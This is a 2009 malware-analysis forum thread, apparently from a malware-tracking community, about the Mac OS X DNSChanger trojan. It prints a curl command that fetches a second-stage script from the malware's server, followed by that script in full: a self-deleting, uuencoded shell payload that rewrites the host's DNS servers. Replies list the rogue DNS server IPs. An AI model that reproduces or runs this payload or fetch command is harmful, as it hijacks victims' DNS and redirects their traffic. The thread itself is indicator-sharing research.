Author Topic: hs.2-109.zlkon.lv - (94.247.2.109)  (Read 11872 times)

0 Members and 1 Guest are viewing this topic.

April 18, 2009, 04:43:25 am
Read 11872 times

MarcusB

  • Guest
OSX version of DNSChanger contacts "94.247.2.109" with User-Agent "i386;0;7777;my_hostname;" to download another shell script at "/cgi-bin/generator.pl" which contains IPs to change the hosts DNS Server IPs to.

http://www.virustotal.com/analisis/00b8a659101f9a3446a6d88f1379ff31


Quote
curl -A 'i386;0;7777;my_hostname;' 94.247.2.109/cgi-bin/generator.pl
#!/bin/sh
tail -11 $0 | uudecode -o /dev/stdout | sed 's/TEERTS/'`echo ml.pll.oop.ojo | tr iopjklbnmv 0123456789`'/' | sed 's/CIGAM/'`echo ml.pll.oop.ojk | tr iopjklbnmv 0123456789`'/'| sh && rm $0 && exit
begin 777 mac
M(R$O8FEN+W-H"G!A=&@](B],:6)R87)Y+TEN=&5R;F5T(%!L=6<M26YS(@H*
M5E@Q/2)414525%,B"E98,CTB0TE'04TB"@I04TE$/20H("@O=7-R+W-B:6XO
M<V-U=&EL('P@9W)E<"!0<FEM87)Y4V5R=FEC92!\('-E9"`M92`G<R\N*E!R
M:6UA<GE397)V:6-E(#H@+R\G*3P\($5/1@IO<&5N"F=E="!3=&%T93HO3F5T
M=V]R:R]';&]B86PO25!V-`ID+G-H;W<*<75I=`I%3T8**0H*+W5S<B]S8FEN
M+W-C=71I;"`\/"!%3T8*;W!E;@ID+FEN:70*9"YA9&0@4V5R=F5R061D<F5S
M<V5S("H@)%98,2`D5E@R"G-E="!3=&%T93HO3F5T=V]R:R]397)V:6-E+R10
14TE$+T1.4PIQ=6ET"D5/1@H`
`
end

April 20, 2009, 10:37:00 am
Reply #1

Serg

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 132
In script dns servers are
Code: [Select]
85.255.112.130
85.255.112.170
Could u provide a link (may be virustotall) to "install.pkg"?

April 20, 2009, 10:41:18 am
Reply #2

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
In script dns servers are
Code: [Select]
85.255.112.130
85.255.112.170
Could u provide a link (may be virustotall) to "install.pkg"?

Are you looking for the OSX DNSChanger ?

http://www.malwaredomainlist.com/mdl.php?search=MAC+OSX%2FRSPlug-F&colsearch=All&quantity=50
Ruining the bad guy's day


April 20, 2009, 08:17:45 pm
Reply #4

Serg

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 132